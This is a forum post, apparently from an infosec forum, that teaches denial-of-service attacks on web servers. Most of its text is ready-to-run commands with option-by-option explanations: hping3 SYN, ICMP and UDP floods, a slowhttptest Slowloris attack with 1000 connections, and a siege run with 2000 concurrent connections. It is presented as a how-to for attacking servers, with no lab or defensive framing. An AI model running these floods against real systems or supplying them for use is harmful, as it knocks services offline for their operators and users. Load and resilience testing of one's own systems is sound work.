InfoSec Forums InfoSec Forums Web Application Penetration Testing DOS/DDOS hping3: DOS AND DDOS ATTACKS THE SERVER WEB

This topic contains 0 replies, has 1 voice, and was last updated by do son do son 2 weeks, 5 days ago.

• Author
    do son
    do son
    • Topics:202
    • Comments:51
    • ★★★★

hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like
    ping do with ICMP replies. Hping3 handles fragmentation, arbitrary packet body and size and can be used in order
    to transfer files under supported protocols.
    Hping3 can be used, among other things to: Test firewall rules, [spoofed] port scanning, test net performance
    using differents protocols, packet size, TOS (type of service) and fragmentation, path MTU discovery, files
    transferring even between really fascist firewall rules, traceroute like under different protocols, firewalk like usage,
    remote OS fingerprint, TCP/IP stack auditing.

I will begin with an attack on the excess of the maximum number of half-open sessions ( the SYN-flood ):

hping3 –flood -S -p 80 113.432.421.2

options: -flood: send as many packages as possible.
    -S: Use SYN packets
    -p 80: packets sent to port 80 ( the HTTP ).

The second type of attack is the ICMP-flood . It is better to use, together with the large size of packages to try to exhaust entering the attacked server channel.

hping3 –flood –icmp -d 1000 dstIP

options: -icmp: using ICMP packets
    -d 1000 – indicates the size of the package

Now let’s try the UDP-flood . This attack also saturates the bandwidth.

hping3 –flood –udp -s 53 –keep -p 68 192.168.232.36

options: -udp: use the UDP
    -s 53: the port 53
    -keep: fix the port of departure, otherwise it will increase by 1 for each next package
    -p 68 : send packets on port 68

Now for the attacks directly on the self Web server.
    The first will be an attack on a slow connection. The meaning of this attack is that any Web server has a limit on the number of concurrent connections, but when i are connected and very slowly requested pages – the connection is not reset, and the number of concurrent connections the server is limited.

slowhttptest -c 1000 -H -i 20 -r 200 -t GET -u http://dstIP -x 24 -p 3
    parameters:
    -c – the total sum of the number of connections
    -i – pause between sessions for the loading of the page (in a single connection)
    -r – the number of connections per second
    -t GET – use GET requests (as can be the POST )
    -u – the URL . Supports HTTP and HTTPS links
    -x – the number of bytes downloaded from the page in a single session (as part of a single connection)
    -p – timeout when checking the connection. If the server response is not received during this time, the server is considered
    unavailable-H – attack slow headers aka Slowloris Also available types of attacks:-B – Attack slow body aka RU-Dead-Yet-R – attack range attack aka Apache killer – the X – attack Slow Read

And the last type considered attacks. Utility siege , which simply asks, in a huge number of streams, site pages, after which there is exhaustion of resources or server (if the requested heavy village) or outbound channel resources (if the requested heavy files).

siege -i -c 2000 https://dstIP/page
    used options:
    -i: to simulate a normal user
    -c: the number of connections
    page – requested page. type of attack depends on the selected page.

You can this utility to transfer the flag -R file listing pages

No system is truly secure!

You must be logged in to reply to this topic.